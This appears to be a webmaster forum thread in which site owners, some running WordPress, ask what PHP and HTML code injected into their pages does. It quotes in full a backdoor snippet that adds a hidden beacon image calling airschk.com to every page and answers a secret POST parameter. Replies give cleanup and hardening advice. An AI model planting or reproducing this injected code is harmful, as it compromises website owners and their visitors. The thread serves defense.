i got this unexpected ...someone insert this into my site footer..what is this code do? <div id="l64dae84c467843a09b8007f50"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae84c467843a09b8007f50&a=%97%3FiI%0A%8FQ%C5H%ED%B1%E6%E1G%EAz_%B2%10%14%28%F2%F9%DB2%BDis%ABP%E3%CE%0F7S%D3%F0%0Ape"></div> Code (markup):
This is a full code...does anyone know what this will do to my site? <?php //{{126104ed GLOBAL $alreadyxxx; if($alreadyxxx != 1) { $alreadyxxx = 1; $olderrxxx=error_reporting(0); function outputxxx_callback($str) { $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>'; preg_match("|</body>|si",$str,$arr); return str_replace($arr[0],$links.$arr[0],$str); } function StrToNum($Str, $Check, $Magic) { $Int32Unit = 4294967296; $length = strlen($Str); for ($i = 0; $i < $length; $i++) { $Check *= $Magic; if ($Check >= $Int32Unit) { $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit)); $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check; } $Check += ord($Str{$i}); } return $Check; } function HashURL($String) { $Check1 = StrToNum($String, 0x1505, 0x21); $Check2 = StrToNum($String, 0, 0x1003F); $Check1 >>= 2; $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F); $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF); $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF); $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F ); $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 ); return ($T1 | $T2); } function CheckHash($Hashnum) { $CheckByte = 0; $Flag = 0; $HashStr = sprintf('%u', $Hashnum) ; $length = strlen($HashStr); for ($i = $length-1; $i >= 0; $i--) { $Re = $HashStr{$i}; if (1 === ($Flag % 2)) { $Re += $Re; $Re = (int)($Re / 10) + ($Re % 10); } $CheckByte += $Re; $Flag ++; } $CheckByte %= 10; if (0 !== $CheckByte) { $CheckByte = 10 - $CheckByte; if (1 === ($Flag % 2) ) { if (1 === ($CheckByte % 2)) { $CheckByte += 9; } $CheckByte >>= 1; } } return '7'.$CheckByte.$HashStr; } function getpr($url) { $ch = CheckHash(HashURL($url)); $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";; $data = file_get_contents($file); $pos = strpos($data, "Rank_"); if($pos === false){return -1;} else{ $pr=substr($data, $pos + 9); $pr=trim($pr); $pr=str_replace(" ",'',$pr); return $pr; } } if(isset($_POST['xxxprch'])) { echo getpr($_POST['xxxprch']); exit(); } else ob_start('outputxxx_callback'); error_reporting($olderrxxx); } //}}861921ab PHP:
The image is used to notify the script kiddies that there is a backdoor on your site. Does your host use mod_security? If they don't, ask them to implement it. Are your scripts up-to-date? If they aren't, upgrade urgently. You should restore your site from a backup, just in case the attacker has also affected other files that you are not aware of. If you don't have (recent) backups, search all folders for suspicious files or check your access logs.
i searched and remove manually...also is this something i can use htacess to block it? i am newbie when come to host. My host is 1and1.com Thanks,
No, you can't block them with htaccess. The most you can do with htaccess is block the IP address of a particular attacker, but it wouldn't prevent attacks from a random attacker/bot. I could be wrong, but as far as I know 1&1 doesn't use mod_security, Suhosin (hardened PHP), suPHP or anything similar. These are the essentials for a security-conscious host. While your site should be fairly safe at 1&1 if you constantly update all your scripts (including add-ons), you should consider moving to a hosting company that takes the security of the clients' sites more seriously.
What script r u using? This is usually sign of a security glitch. Run a virus scan from ur hosting control panel that usually fixes it without having to remove it manually.
i use couple different scripts, including wordpress and every single sites on my server are effected. My question is how can this insert into my .php file? Thanks
If one of ur script has any security glitch then it can spread from one single file and execute a attack on all the files in the server. I would recommend you do a full scan of ur server and remove all the traces of the code. This happened to me few months ago and i had to do a full scan of my server. Surprisingly i found 1000+ files infected then i reported this to my script company and they provided me with a patch. U can read more about script vulnerabilities here : en.wikipedia.org/wiki/Cross-site_scripting
The same happened to me last week, the weired thing is all my sites on three different servers was hacked with the same exact code you posted above! I had to recover one of my WordPress installations manually as I couldn't find a recent backup! And I am still working on the other sites! This is a nightmare as I have more than 40 WP installations that might be infected! Basically from what I see, this code try to steal Rank or Traffic!
the same happened to me last week too and i've fixed after i got msg from google informed me about that my websites are maybe hacked . as the search i did it was some attack based on botnet using wp bug
You need to sanitize inputs on your site so this kind of stuff doesn't happen in the future. Search Google for "sanitizing php input". These attacks are common so it's up to the programmer to protect against them!